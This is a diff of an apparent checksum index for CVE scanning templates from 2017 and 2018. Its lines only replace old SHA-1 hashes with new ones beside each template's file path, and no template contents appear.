@@ http/cves/2017/CVE-2017-1000163.yaml:0c603eb787ab15dd4f944ea5b87b78f4af11afb8 http/cves/2017/CVE-2017-1000170.yaml:7ba7587d2b35dc762634a2c9490ca0bdea3fda51 http/cves/2017/CVE-2017-1000486.yaml:5345b553ebe658749c5016c21fc17f4e7fdc12aa http/cves/2017/CVE-2017-10075.yaml:ea4df8e06524ec92943b5b1d10920d92f190aa72 -http/cves/2017/CVE-2017-10271.yaml:c4d6d49ab294a59ba606325b0acabdc7be08bbae +http/cves/2017/CVE-2017-10271.yaml:e82b7968831e2e34ebd8173b5cf75535212c06b1 http/cves/2017/CVE-2017-10974.yaml:b0ae2bfd11149aecfa26d8faa954a8f8292f171c -http/cves/2017/CVE-2017-11165.yaml:4abee409b33591001d45b096b6831499a91d3bcb +http/cves/2017/CVE-2017-11165.yaml:4c721af11329d438323011af4b7b27d4c39d553e http/cves/2017/CVE-2017-11444.yaml:e1fedcc6cdc98248426ca0fb2352f1cd3861e2a9 -http/cves/2017/CVE-2017-11512.yaml:1cfc04d6428e8e76fbb3feb437ebde04e509a684 +http/cves/2017/CVE-2017-11512.yaml:99bff3d6c0043123312b29a2db66d9c66b991386 http/cves/2017/CVE-2017-11586.yaml:cb58394e00a6e06966ba607d6a4ebca3ac268972 -http/cves/2017/CVE-2017-11610.yaml:eba5c87798e309ab7c2ed89224a3a97f1c95df53 -http/cves/2017/CVE-2017-11629.yaml:fc84633073745770603d19a552733beea2ac9779 +http/cves/2017/CVE-2017-11610.yaml:1c364289e03ea558584956909933cdc417595792 +http/cves/2017/CVE-2017-11629.yaml:ab802fc363e09d2bfb2acec39d90651eee90438a http/cves/2017/CVE-2017-12138.yaml:a1554be248c76a1249afeb83ac82a58f34e20390 -http/cves/2017/CVE-2017-12149.yaml:8e2fbc198b479812329b84de8a428699bcd1d2d8 +http/cves/2017/CVE-2017-12149.yaml:1d1ae0c6038f4c1c0adf1b59194464613fa40808 http/cves/2017/CVE-2017-12542.yaml:0f4e30ef500ff64da2e8c5eca028a1dd35a44f6c http/cves/2017/CVE-2017-12544.yaml:07292848eebcdfadb01f7e946fb853685a612de5 -http/cves/2017/CVE-2017-12583.yaml:b819605bd22e17173142db5497ef7649bb5f83eb -http/cves/2017/CVE-2017-12611.yaml:1993c3d7c28326bc0c5701c84dcdbbe8777de6be -http/cves/2017/CVE-2017-12615.yaml:40f7f4d617668238e645d70888cab907c4bb687d -http/cves/2017/CVE-2017-12617.yaml:da64d230dee94b884c7e8384e9ebf7bfedc9c424 -http/cves/2017/CVE-2017-12629.yaml:c257f7eeaf409d969825d8298387c2300ed7adf4 -http/cves/2017/CVE-2017-12635.yaml:89903a430387c5ce7c178df83444800fc326c22c -http/cves/2017/CVE-2017-12637.yaml:1b6bd16d62ac6f72abebffaa4f9f9dc32e52cb3b +http/cves/2017/CVE-2017-12583.yaml:545467f96bdc3a2415d7b7c6c15b2f818161a0b1 +http/cves/2017/CVE-2017-12611.yaml:ec6c2bf95913ae4b0de09ce611ffdeceb1904ca7 +http/cves/2017/CVE-2017-12615.yaml:7762ce2bedfd3899f5807ff87b35a7091e1fe90d +http/cves/2017/CVE-2017-12617.yaml:f2d69f026c0d0c2b776bd57deae1de61e10f2295 +http/cves/2017/CVE-2017-12629.yaml:05717fc98ead0c7f9502ca5b761b96c34ab2e9d2 +http/cves/2017/CVE-2017-12635.yaml:6db5b2c94b70bba0b705eccef8770362ebad1fa4 +http/cves/2017/CVE-2017-12637.yaml:90cef6968bc79da9073d5ab60972246453650376 http/cves/2017/CVE-2017-12794.yaml:c56afff76e73c7654ea22b8a35d2b410d92bccc6 -http/cves/2017/CVE-2017-14135.yaml:510f2f619a872f6a885dda7291a4d923ff185753 -http/cves/2017/CVE-2017-14186.yaml:8b9c2e8b1df76fe3d4d39ebc0d9cb11c669ddb62 +http/cves/2017/CVE-2017-14135.yaml:8b78856994e015e4119d48feca8876a91526bc2a +http/cves/2017/CVE-2017-14186.yaml:cf4a3ab29483d3b76be72fb228de332740825879 http/cves/2017/CVE-2017-14524.yaml:40770e458708602b1efdb5b38b10272db1d4423b http/cves/2017/CVE-2017-14535.yaml:36184e53e63918cccb1dc69c16eb38358180f971 http/cves/2017/CVE-2017-14537.yaml:b63bf53960d40b3f5711d611754cb9a86ee8c053 http/cves/2017/CVE-2017-14622.yaml:5ffbed6d0ec83209380bb7e610c118f762b182df http/cves/2017/CVE-2017-14651.yaml:e8adee45b732510acc3690917813717fb892a10b http/cves/2017/CVE-2017-14849.yaml:853c08fbe5c5e6c85de61301449553acbad6f05b -http/cves/2017/CVE-2017-15287.yaml:6000296cdf09698cffa12c51e003822697406662 +http/cves/2017/CVE-2017-15287.yaml:9d36d5efefd0ab6bee467c9e64dfd51898f84ab6 http/cves/2017/CVE-2017-15363.yaml:1ff2f8921e452c8a14847f6dee1c5340ce2e4e49 http/cves/2017/CVE-2017-15647.yaml:f63b7309ad40a6ccf4c6af1f518e911416eb2ec3 -http/cves/2017/CVE-2017-15715.yaml:8ebe5ef421beb30836ce4b73a7ced652174e7d7c -http/cves/2017/CVE-2017-15944.yaml:8bc2112905b54238725ec0d269e8b1f2d539cd89 +http/cves/2017/CVE-2017-15715.yaml:22f8ce8a35a128a21832486e18935553ea5f1052 +http/cves/2017/CVE-2017-15944.yaml:a2dfce063a513f801f16ab729bb506ae78a50355 http/cves/2017/CVE-2017-16806.yaml:5a788972a7ebb5bfdda60837c9543ff996c9e9fb -http/cves/2017/CVE-2017-16877.yaml:647f32ff1ece73be040cec73060694e9cccbf8e4 -http/cves/2017/CVE-2017-16894.yaml:cc779a98a64aa8bbeb1694c3f0922a45974063b6 -http/cves/2017/CVE-2017-17043.yaml:1faa4df6f6577cfe32bb09c58fe66b2ef754cba4 -http/cves/2017/CVE-2017-17059.yaml:c892ab75bb1834584b10c435e8ea434a3c8012d6 -http/cves/2017/CVE-2017-17451.yaml:1a8fa69ee3d82c0ac12ad13584c8fb0af61d4957 +http/cves/2017/CVE-2017-16877.yaml:596f96119fe3c5e365ac8a7ad491841d74376dd3 +http/cves/2017/CVE-2017-16894.yaml:cfcc6942c45ef24179101f159564cce19ec80b09 +http/cves/2017/CVE-2017-17043.yaml:4dcc28dc1efb051b58fac455eed9fe28387b5b00 +http/cves/2017/CVE-2017-17059.yaml:db14f75ffaabebc0ee5d3462e195381efb3d349d +http/cves/2017/CVE-2017-17451.yaml:5807a4617ef6a7a60e7e802b402d5598b02d2304 http/cves/2017/CVE-2017-17562.yaml:3150e287ce0f8e4f5529a0103844e02be65a5f80 -http/cves/2017/CVE-2017-17731.yaml:3f51a3a99f2e8b5bfd36c145bbabaea0607acd75 -http/cves/2017/CVE-2017-17736.yaml:fd899ec80278ce3631ef111ab0c616233f1ee315 +http/cves/2017/CVE-2017-17731.yaml:9acd91272f9586b06be8168a311f8f6fd4067822 +http/cves/2017/CVE-2017-17736.yaml:082f571e59c2928404cc51eeef4ea0f041881e27 http/cves/2017/CVE-2017-18024.yaml:9e42c545d599b03b2602a86a13618441d34bfafb -http/cves/2017/CVE-2017-18487.yaml:f0a246a0a5ef0f05410c7c8537c5610488be7027 -http/cves/2017/CVE-2017-18490.yaml:48455ec9d00dd27c817580bbc9a5e17b6059dccd -http/cves/2017/CVE-2017-18491.yaml:28b658ab3b50b4f490831748f02f282303c7f8ae -http/cves/2017/CVE-2017-18492.yaml:d440d75aee24dc6de7941c745ede9c3470ac1b7f -http/cves/2017/CVE-2017-18493.yaml:c8094504b97edaf846cf1b8f411bb8b2aa1bc23d -http/cves/2017/CVE-2017-18494.yaml:37b04d4b0b9b8bde5573d553447e3e7e341935bb -http/cves/2017/CVE-2017-18496.yaml:1eb967d74ce4d6c33a7d5664fc57e55b29f01186 -http/cves/2017/CVE-2017-18500.yaml:0498aaedc7a59f2c4a1a116dd08ba5f8299de179 -http/cves/2017/CVE-2017-18501.yaml:dab2bb19389acd57d2bd23c9e05f90a2f6341ba6 -http/cves/2017/CVE-2017-18502.yaml:b7b41b4518955c572ff520630bae770a7eab3f96 -http/cves/2017/CVE-2017-18505.yaml:a85b34e55bc6224da1b5952a0ee2a52a99b002b7 -http/cves/2017/CVE-2017-18516.yaml:e10b94be4f71de28574f89312512a969622697ca -http/cves/2017/CVE-2017-18517.yaml:2b5fa1cdd9f2d67e28c275c47cec55af53aa3a94 -http/cves/2017/CVE-2017-18518.yaml:3250e688c4596ee53917d84886bd4a19aed22186 -http/cves/2017/CVE-2017-18527.yaml:778fd4e2ce01c2ac584d34578b4e24a5e11d3966 -http/cves/2017/CVE-2017-18528.yaml:b9f628099df7e0be59b9971727d96ecd8ca7db2c -http/cves/2017/CVE-2017-18529.yaml:b85d0dea7b4251f6f9693aa93cca7d0c6a5e5241 -http/cves/2017/CVE-2017-18530.yaml:c1f6b8f720f547e347c0dc0ba30eb7070e9c9fc5 -http/cves/2017/CVE-2017-18532.yaml:f2250ec678ac6553cd407e7fca7b89d59e6ce9d4 +http/cves/2017/CVE-2017-18487.yaml:2305a0a1e62a266e437fb9b68e54418e73d5e3f9 +http/cves/2017/CVE-2017-18490.yaml:2afd96d71bf34040364d33f5e08572e0e039fea8 +http/cves/2017/CVE-2017-18491.yaml:28cbcd7a177279e7df229d7af4e4ce0dd6d732ab +http/cves/2017/CVE-2017-18492.yaml:3394dc05238fbc6748c825c9f2ddcff51a298df0 +http/cves/2017/CVE-2017-18493.yaml:3836205e2f58d2e4764ac2bbc1c639e6e441c7b7 +http/cves/2017/CVE-2017-18494.yaml:123f279ddbc3d7914d23252f68bff99ee8564d00 +http/cves/2017/CVE-2017-18496.yaml:be4685e1d99ffc7544c9495f12517f5d8e007f43 +http/cves/2017/CVE-2017-18500.yaml:41cff64139a5c1b5d3b4c15b98f6c912cee89786 +http/cves/2017/CVE-2017-18501.yaml:0e1fa6bf026c50767384d5fbff8d7e18e5c452d2 +http/cves/2017/CVE-2017-18502.yaml:817b43ebaea85b2a295ac7bb7e4cd008fe44990b +http/cves/2017/CVE-2017-18505.yaml:651618e19b63e64dcfe36b3b5b29ca38de5027d3 +http/cves/2017/CVE-2017-18516.yaml:2cdb2d34215d36810265732281877bb7225de95c +http/cves/2017/CVE-2017-18517.yaml:0c16f6dbbb213f7cd4d1b9095f6980da6277d6fc +http/cves/2017/CVE-2017-18518.yaml:38ae40ed19d3c44ca14e1882a7a62987e512662b +http/cves/2017/CVE-2017-18527.yaml:54d4834aa0374412da813dcb3b8f0a48a0bc28ff +http/cves/2017/CVE-2017-18528.yaml:22e59fc04c20ab8d9f6aa2a0ea491ca0c120a47d +http/cves/2017/CVE-2017-18529.yaml:522df37035c27bdf5cb6ab691014ce28b960bb23 +http/cves/2017/CVE-2017-18530.yaml:c90065a3437808b3ae1171c53e1966a80a91bee5 +http/cves/2017/CVE-2017-18532.yaml:ec9aab04941674377707c69aa01a0755c27f0988 http/cves/2017/CVE-2017-18536.yaml:41a5883c94c1941dbb3026c74c998dc04d1a601e -http/cves/2017/CVE-2017-18537.yaml:d4dc7eeadee533323c5f3877409ffbdd4929e204 -http/cves/2017/CVE-2017-18542.yaml:4b64131d7f9ec2c0c3159255254158f7228abc49 -http/cves/2017/CVE-2017-18556.yaml:1fe561c24092fbf003ac72967fd8a3084065812b -http/cves/2017/CVE-2017-18557.yaml:d701507eec81973f152631361febf59ec56d1a6b -http/cves/2017/CVE-2017-18558.yaml:b7230400233b64080754dd6e80658b0852231b4d -http/cves/2017/CVE-2017-18562.yaml:afd3097c8776a794b43b5a52d88a664425764f36 -http/cves/2017/CVE-2017-18564.yaml:74ab76cdcf46659cca6c1ea77cb9213ba01e51c2 -http/cves/2017/CVE-2017-18565.yaml:d64b8f0a6479f9868d0909ca3dd47aba11df865a -http/cves/2017/CVE-2017-18566.yaml:54fd16f9c7f113b4722d0ab7f08cc01e5ab0a00b -http/cves/2017/CVE-2017-18598.yaml:719fce236cacd3acd5ff5821908da70fff098592 +http/cves/2017/CVE-2017-18537.yaml:e589d6d33c5dccfbfb433d9f7f1d71bf080d680e +http/cves/2017/CVE-2017-18542.yaml:98003ed998917d79ff72edc00339ff021cd0ea21 +http/cves/2017/CVE-2017-18556.yaml:59b8e84e495d2fd3b88be299e3b4c2e3ef81093d +http/cves/2017/CVE-2017-18557.yaml:03e9c97c5d0c74a5eb8714e4f30e57b6293eb460 +http/cves/2017/CVE-2017-18558.yaml:99a0fc15cd711f253ad20a854694fdecc53395a8 +http/cves/2017/CVE-2017-18562.yaml:fc05734aaa5062f9b02134840b8cc2ce6a5e4ec2 +http/cves/2017/CVE-2017-18564.yaml:1eb9ac8f5377c73a2409f88ddfe10dc4aed93a6a +http/cves/2017/CVE-2017-18565.yaml:06f07131b688e14a98a3ebeb0542b002351086ef +http/cves/2017/CVE-2017-18566.yaml:13cde74c37e4f970764b0598940b4d417021bb1c +http/cves/2017/CVE-2017-18598.yaml:f5aec52d4dd9d50af0312e1826c1737d0760c65d http/cves/2017/CVE-2017-18638.yaml:5e91379f58e5c4cda0e0863aadc67c71a96d6559 -http/cves/2017/CVE-2017-3506.yaml:12b9bc3a81b1c55c622b03b41e274bb582208b19 +http/cves/2017/CVE-2017-3506.yaml:501c47b7305b074e4e4662e8ca5361adc6c1dd50 http/cves/2017/CVE-2017-3528.yaml:ec01ac21133968ed4d05e0535b7badae0939dc19 http/cves/2017/CVE-2017-4011.yaml:f8387b349e05c712d5e9c5ccfeaf56a80317c75a -http/cves/2017/CVE-2017-5521.yaml:441d7bb12801dc564993e7673c6c9c31ab43f79c +http/cves/2017/CVE-2017-5521.yaml:1f871b166451d878454cfe1420e234829035a5d0 http/cves/2017/CVE-2017-5631.yaml:64149ea9528e6a81bcde94ef088db0d5f13b7c2d -http/cves/2017/CVE-2017-5638.yaml:cd89c603ba617db8c5a9471832b727471ce1ae6c -http/cves/2017/CVE-2017-5689.yaml:1be0f56b52c9b826d89b2bd7cf1ad720e7184961 +http/cves/2017/CVE-2017-5638.yaml:b286068db13022e9173f20fdb3d8e75ee88cfdd0 +http/cves/2017/CVE-2017-5689.yaml:46afc751deed3fa7c9a89b625cf3ae9850b4dfa2 http/cves/2017/CVE-2017-5982.yaml:2cc9e80970cd0d0f3fddf4e79b615e8f80f945be -http/cves/2017/CVE-2017-6090.yaml:8a13b4efc5f9804693c2683423421735b2de3667 +http/cves/2017/CVE-2017-6090.yaml:28a7f5964c0e40017259c76c22c343b9b408e323 http/cves/2017/CVE-2017-7269.yaml:f16a7101c1403bd7557b170c713670c640a55c52 http/cves/2017/CVE-2017-7391.yaml:db61bf2e66f06a7be89057d22daa11bdbfcb1d72 -http/cves/2017/CVE-2017-7615.yaml:82207da904d8e6f360a196d837d2a064b563fefb -http/cves/2017/CVE-2017-7855.yaml:033912cd7c7c8811ce7df75b334efcfed008d425 +http/cves/2017/CVE-2017-7615.yaml:544655efbd6f5f943d95fd9a26fd3b20ac9c2354 +http/cves/2017/CVE-2017-7855.yaml:2025d3f1021cc307f8e13b7b30ca74ff147fd60c http/cves/2017/CVE-2017-7921.yaml:b64dd053472ec2eb04035ea846e3beeb6db8674c http/cves/2017/CVE-2017-7925.yaml:6924f88514cb1e461f2fd1ea7f5baa463576afbb -http/cves/2017/CVE-2017-8229.yaml:5904f7e455bf3a8b4fdc772fb95abc1429f1ab66 -http/cves/2017/CVE-2017-8917.yaml:b988125caf0c36d19d3e519d9935d5cf1bb8851e +http/cves/2017/CVE-2017-8229.yaml:eeb11980a7973dd2da61eca9fe232d19335f3ce5 +http/cves/2017/CVE-2017-8917.yaml:2b87ad15833a904cffe42670982baabff23f0748 http/cves/2017/CVE-2017-9140.yaml:20a875398f9abd82dd93831499d71542c3a4306b -http/cves/2017/CVE-2017-9288.yaml:f8dedeb9681681df484b827a5b6202feb453f565 -http/cves/2017/CVE-2017-9416.yaml:f8529409df5526dc064d44d038e7587240188912 -http/cves/2017/CVE-2017-9506.yaml:680ead22bf5a92cfe1a6a558a18d00bd2bf4f81a -http/cves/2017/CVE-2017-9791.yaml:5687baa275538df48a4ba17fcd6482a5ec914276 -http/cves/2017/CVE-2017-9805.yaml:3641fe41a685af3dc8e80a4b6152209af80d65a2 +http/cves/2017/CVE-2017-9288.yaml:478274a5d684bbc80aa25a00b9a956aa74e328ce +http/cves/2017/CVE-2017-9416.yaml:2a3c8595197d5cee59e0f4b8febe1bab9b3fece5 +http/cves/2017/CVE-2017-9506.yaml:86c635fc621eb33fc42368494ad7cf6482822c9d +http/cves/2017/CVE-2017-9791.yaml:cea858b2e33ea4d51f3f65b977b115c437f63b29 +http/cves/2017/CVE-2017-9805.yaml:1e0855852d5cd8db2a893dc656947515f7a7cd62 http/cves/2017/CVE-2017-9822.yaml:b7cd7ac9df9f7255d7623587b44929abbfe234ad http/cves/2017/CVE-2017-9833.yaml:9d5d145ac854cc5f768170b710d4fb541eb2d6df http/cves/2017/CVE-2017-9841.yaml:b17dc781f051451822729dad1584ffc0a690d41a http/cves/2018/CVE-2018-0127.yaml:9039cbd429767ba7737efdc2496732175ed41e85 -http/cves/2018/CVE-2018-0296.yaml:8f811f713bd26781e42619b8ad3cdc084297b52c +http/cves/2018/CVE-2018-0296.yaml:547da955a5d29ebbb7d0282534d726361c2268d5 http/cves/2018/CVE-2018-1000129.yaml:7997bbbbf18a5581821e4a53d8efcd0681b6fda5 http/cves/2018/CVE-2018-1000130.yaml:3919e5d1cc90c92b31671f67da4aaa0b9d15cae9 -http/cves/2018/CVE-2018-1000226.yaml:592bafff575e1244e6e273d44450343ae45bbaf6 +http/cves/2018/CVE-2018-1000226.yaml:54fc6a14f5da764e2f6edc6138d2f6250d25f189 http/cves/2018/CVE-2018-1000533.yaml:b92b15bce22e0a205905d8eb8422d3156f08a00e http/cves/2018/CVE-2018-1000600.yaml:910c040b7e95fb65e496c661906baaf38381897a -http/cves/2018/CVE-2018-1000671.yaml:8bf68889af5f3b1d98e20d8f9360522d4b641632 +http/cves/2018/CVE-2018-1000671.yaml:6ff95a5150e2650b34223428b0c9dc0c54d4ac4e http/cves/2018/CVE-2018-1000856.yaml:2aebd84fe344186cc05409d5953ee81536be3052 -http/cves/2018/CVE-2018-1000861.yaml:fa2f03128f84ff07428793f51a354d890d7eab02 +http/cves/2018/CVE-2018-1000861.yaml:01d9c5b1f610de0a73651fab839ef717ac56670a http/cves/2018/CVE-2018-10093.yaml:c9b9167e15f9893649b46486f1cd02ddbadcf6af -http/cves/2018/CVE-2018-10095.yaml:b575dc701664434c37703e8ecd03ad7b09e924d8 -http/cves/2018/CVE-2018-10141.yaml:91f177c2d445f0ce201654d12ef844433cabff9b +http/cves/2018/CVE-2018-10095.yaml:16ab4eaf400de007582cbd43ad5740a1d0f0b606 +http/cves/2018/CVE-2018-10141.yaml:b4f7ad829c2f73314e469e6e9c4732f22cd48621 http/cves/2018/CVE-2018-10201.yaml:e3825699cee6c241f0a763a3d9d3eb0c07723d9c -http/cves/2018/CVE-2018-10230.yaml:eee748e919425ece39ce03c57745d4af3a7c2d81 +http/cves/2018/CVE-2018-10230.yaml:037412173088644cfa9dfa9e50ccd3a44577e0cc http/cves/2018/CVE-2018-10562.yaml:990e4f11aa8b166e606a477f9913e2da7921179f -http/cves/2018/CVE-2018-10735.yaml:b005790374cbe4515b8e3b8a1a6ec017f2e7a949 -http/cves/2018/CVE-2018-10736.yaml:a0240c5691781a413d3e6c0cd04be99f0b29fb42 -http/cves/2018/CVE-2018-10737.yaml:71987c9f6bea240300b20e7c0d42fbb6abcdee7b -http/cves/2018/CVE-2018-10738.yaml:a129143d1e25d813e6a8ed5af3a9512672e42285 +http/cves/2018/CVE-2018-10735.yaml:7f6de3438dbf42c426418df6e4d002a6769bd22a +http/cves/2018/CVE-2018-10736.yaml:671fb31ecf0cd962cb762b6355cdf2fcbd656152 +http/cves/2018/CVE-2018-10737.yaml:a6b4fdfd336b2f5a194eef4d2b8c8909e8d541bb +http/cves/2018/CVE-2018-10738.yaml:f02f1a13c9e007d0e21285a0a9f5c31fcbe3752e http/cves/2018/CVE-2018-10818.yaml:efa3271174cdf4babcac2932f09ca4d5e35b49d2 http/cves/2018/CVE-2018-10822.yaml:7f0a230ae784c9666bb8be847c4b06e77ecf6a28 http/cves/2018/CVE-2018-10823.yaml:a5d4167b803821e0149da4c0ef358976f59ab9a0 -http/cves/2018/CVE-2018-10942.yaml:58ba5b471d4abde0425163b67eaed37bfe6a57c4 -http/cves/2018/CVE-2018-10956.yaml:1204c261608d7354d999fad8912c779e0de3dfb0 +http/cves/2018/CVE-2018-10942.yaml:00dd49ed7a5a2c896bc4c31613aaddbe7ba9993e +http/cves/2018/CVE-2018-10956.yaml:58a74835e84d6dd4caca8a54fd804440b41ddf5a http/cves/2018/CVE-2018-11227.yaml:53df328cd18067c2bfc7a54db4c082c74c882368 http/cves/2018/CVE-2018-11231.yaml:51626c805600f217d4c3eb66418488e1e9b39398 -http/cves/2018/CVE-2018-11409.yaml:c6091a66c75ccc17eb0ac5f6522d4e71d60475bb +http/cves/2018/CVE-2018-11409.yaml:033638ca40ac0bd0b40cc9c0580d9ae710870260 http/cves/2018/CVE-2018-11473.yaml:d9d4a345254b353f60f767a76a59fa107d608d78 http/cves/2018/CVE-2018-11709.yaml:2182a3c38d7b41f6b6b36a9722623d47260d55c7 -http/cves/2018/CVE-2018-11759.yaml:1f4f6fcbda8ca7a79b5fa2820e2d88d02cf5af01 -http/cves/2018/CVE-2018-11776.yaml:c278de7c331f4d1eb567a55328406cb13e2ab8fc -http/cves/2018/CVE-2018-11784.yaml:46298721157a5d14a61de9549884cefb5ba79e51 +http/cves/2018/CVE-2018-11759.yaml:b972972db8d4d0f9fc9b0619087531d3a8b8cf06 +http/cves/2018/CVE-2018-11776.yaml:c5a8cf5b03b08247dc9dbfabda18c7243a28ae51 +http/cves/2018/CVE-2018-11784.yaml:22a23938cbc3bd21f5609b50d5412703e1a34fec http/cves/2018/CVE-2018-12031.yaml:4779e625bb9ad13c228b5b2dff9d04338aea3aed -http/cves/2018/CVE-2018-12054.yaml:4bd015a55fedc7b0cf898eaf9a3049aad883ac05 +http/cves/2018/CVE-2018-12054.yaml:d2c4275fe1a5bd855f9b3da99b0a01fb9f6011d3 http/cves/2018/CVE-2018-1207.yaml:d725ed522674e6fe25fe4a413ecba7fe32a1b864 http/cves/2018/CVE-2018-12095.yaml:7c6d4a16cc5c42673c2f23abb768466b6164d306 -http/cves/2018/CVE-2018-12296.yaml:fefd3f45861158f5911f0b1d6f5d2df379036bf5 +http/cves/2018/CVE-2018-12296.yaml:1228dd53ee62d06e060e54c723892c20eb94ff85 http/cves/2018/CVE-2018-12300.yaml:4283bdec4127f673c9c0329179a3a915fc902327 -http/cves/2018/CVE-2018-12613.yaml:b7d57877bb9e0fd8fac55ee38fe0c6c7cc70dc26 +http/cves/2018/CVE-2018-12613.yaml:bd0f95bbd36fd69b9130ecc86181ee9dee0895c9 http/cves/2018/CVE-2018-12634.yaml:1cb589cfbe1c1461e84b764f5c4edfa93bb04456 http/cves/2018/CVE-2018-12675.yaml:1019e2a9376f55ef9d0bdf1cedc261fd161623b6 http/cves/2018/CVE-2018-1271.yaml:99a76e403443736e179bba2bd58ad87e6e8d556e -http/cves/2018/CVE-2018-1273.yaml:51f89909ec1b94e979c85d95d7bdc5797fbf8606 -http/cves/2018/CVE-2018-12909.yaml:e3190dfe0c8354393d283dc3bbe60b472953e024 +http/cves/2018/CVE-2018-1273.yaml:db8008442b014c0912e46eca9a3724cef5e5d8b5 +http/cves/2018/CVE-2018-12909.yaml:541bf103b6bae43460840fd26d126691cbd231c0 http/cves/2018/CVE-2018-12998.yaml:47f498dbb37559c753c8fac62600c63ff9a9c791 http/cves/2018/CVE-2018-1335.yaml:fc3469df3a3c51ef4f52a76101fbbc68697c4778 -http/cves/2018/CVE-2018-13379.yaml:b1585abae2672f5cbe06b756af3683663bda0ced -http/cves/2018/CVE-2018-13380.yaml:a724fe8544d6bd1880b43ee9d9e322ab142df429 +http/cves/2018/CVE-2018-13379.yaml:2381237006e0f5ca12a77695db931b9b5b2a637e +http/cves/2018/CVE-2018-13380.yaml:d73e1b06d5584eb6e7247530652ab5443dcd768c http/cves/2018/CVE-2018-13980.yaml:6eb4159b100f832aecbabfb6cef291ef5a910cbf -http/cves/2018/CVE-2018-14013.yaml:18f62843d79c16e941804e7e9c63efd13dbf3148 -http/cves/2018/CVE-2018-14064.yaml:cccc793c46719cb2a7e81374f651331c60a7890b +http/cves/2018/CVE-2018-14013.yaml:cbba1470ba2121590d997cc2df4f427edaaa8ba3 +http/cves/2018/CVE-2018-14064.yaml:e5029142dfb2b8b0d99b1cc467f23c16eafda6f8 http/cves/2018/CVE-2018-14474.yaml:14147a463e7df9164542239aab9693365cc552d3 http/cves/2018/CVE-2018-14574.yaml:08cc9b9112b8242b5ed426aa9a016ffaee8351fa http/cves/2018/CVE-2018-14728.yaml:3005fff6268e3e0079028fc907bcad293f3d69fa -http/cves/2018/CVE-2018-14912.yaml:8637942f6d1cad678d3efcd0fdfbb07cfd5915e7 +http/cves/2018/CVE-2018-14912.yaml:a7cc022cc943f430819a09cc37f2fab634f4cda9 http/cves/2018/CVE-2018-14916.yaml:e395335963bef34ab111725bb0d36d5a69f06780 -http/cves/2018/CVE-2018-14918.yaml:e536408e3be762c36ce321b5ee381e7914ba27c0 +http/cves/2018/CVE-2018-14918.yaml:6f72cb8666ce96de5914071a76cdcb68cb842784 http/cves/2018/CVE-2018-14931.yaml:faa048b946e4befdd3f55328fe9a3d1218ffe567 -http/cves/2018/CVE-2018-15138.yaml:73e253bb1cb6ea31e6a7e7be8c2486bf196671b2 +http/cves/2018/CVE-2018-15138.yaml:e2b922f0ae02891d301de48957efbcdba06d4caf http/cves/2018/CVE-2018-15517.yaml:12e36b24ee809c6e164212d693481a55f58b1130 http/cves/2018/CVE-2018-15535.yaml:bfad4720c9ee69d05e8103533e4f856185d62e66 http/cves/2018/CVE-2018-15745.yaml:448c292479d27f7426b8d45acb2dc8c24dac1ba8 -http/cves/2018/CVE-2018-15917.yaml:f258bab15a5870a96fc436a01da75ad080807eff -http/cves/2018/CVE-2018-15961.yaml:7002b2506196a153ea386aee2db06f292f5039c1 +http/cves/2018/CVE-2018-15917.yaml:2260f4b6625577f43d2ad2379b9da2dd1fabb4d0 +http/cves/2018/CVE-2018-15961.yaml:b5d40974ca6796a98a9b98a74b71b6fb8611f91c http/cves/2018/CVE-2018-16059.yaml:992cc116f8f261abd69f4cb5b9934ce00d83e8e0 http/cves/2018/CVE-2018-16133.yaml:c01d3089c2ebbe72dfe0e54eb3e5c8626e19d362 -http/cves/2018/CVE-2018-16139.yaml:39168cb9083770d3cbddfa4139e0b4cdf61c5247 -http/cves/2018/CVE-2018-16159.yaml:327d838cb702706b8d0d51ac27e8bfe157585a4d +http/cves/2018/CVE-2018-16139.yaml:cb97a42847998052f5be66e5e409bf6cd989e6b4 +http/cves/2018/CVE-2018-16159.yaml:396bae370ddebcd8b72ba9db58e3a2e836ea3322 http/cves/2018/CVE-2018-16167.yaml:176a380e5945ac18fc326e04621f5d433fa876a6 http/cves/2018/CVE-2018-16283.yaml:cd7733e319cc2abbe92fcc06861eed211c030486 http/cves/2018/CVE-2018-16288.yaml:28a0c7098ffd27a2ab982d73c4f5b71abd27f539 http/cves/2018/CVE-2018-16299.yaml:b020da11f05eaa7a8b9eb2136b09cf8190b0b59c http/cves/2018/CVE-2018-16341.yaml:74ccee29760fe9aaf2616353755ab249f6f6fcfb -http/cves/2018/CVE-2018-16668.yaml:48491a4b2add544918c03545451fc5ee424330f3 +http/cves/2018/CVE-2018-16668.yaml:4eb79088a3d726e6bb79eeb26c08c7c2ac469050 http/cves/2018/CVE-2018-16670.yaml:c346dc7a3d1df2c12c8f5f1afb69a09c1d785c9a http/cves/2018/CVE-2018-16671.yaml:906368ef356b2b4c8965f8046fd49dbef0dd821f http/cves/2018/CVE-2018-16716.yaml:18f0e3db7969f3773f0483a9d82b30dc976e5459 @@ -1460,121 +1460,121 @@ http/cves/2018/CVE-2018-16979.yaml:ac6f5cfd3090ba52cea4db62eb8719cbff2b0558 http/cves/2018/CVE-2018-17153.yaml:5cdbe44c616d3ea36184bee2460031b569d362a0 http/cves/2018/CVE-2018-17246.yaml:fe7a3e41ef31e8f761f3df652a564aae3997bbd6 http/cves/2018/CVE-2018-17254.yaml:63a99c6884bcb88c9d81a6d95136c007f8296cf6 -http/cves/2018/CVE-2018-17422.yaml:879432940fa30bcbd2cb3744cf063234690fbe74 +http/cves/2018/CVE-2018-17422.yaml:97bb02a34b57f5379f0832f2b3ebc18910bec4d9 http/cves/2018/CVE-2018-17431.yaml:4f724c2ec11d7e5574b913c8f3d171dc69bf23d6 http/cves/2018/CVE-2018-18069.yaml:fb55c1c8a6544261d3da494f50ffe75d12262d5c -http/cves/2018/CVE-2018-18264.yaml:46b468443b1c2d1213ea57b3bc99475259235dfe +http/cves/2018/CVE-2018-18264.yaml:b604f10f5a5943aed5adbad251c29d2e5c96979e http/cves/2018/CVE-2018-18323.yaml:b10bf4b2ae8e13371ebf965fc3483d3d84a40bdd http/cves/2018/CVE-2018-18570.yaml:b798a41cb7e50801d3a488617513cb1b50c6c790 -http/cves/2018/CVE-2018-18608.yaml:64e72bb9efe88dd889259d024f1c7a9c110de645 +http/cves/2018/CVE-2018-18608.yaml:8459db3f1f0f34be9ad4fa337bf84fc2a824e29f http/cves/2018/CVE-2018-18775.yaml:6855fbb7653fb75ebfb58a92e13a94bddd6363e7 http/cves/2018/CVE-2018-18777.yaml:ea3dae45b965ecb5c04b58193b4d02c42b35f99a -http/cves/2018/CVE-2018-18778.yaml:baf90f3ecb18ea7cdeac5c22299da6660e9adcd5 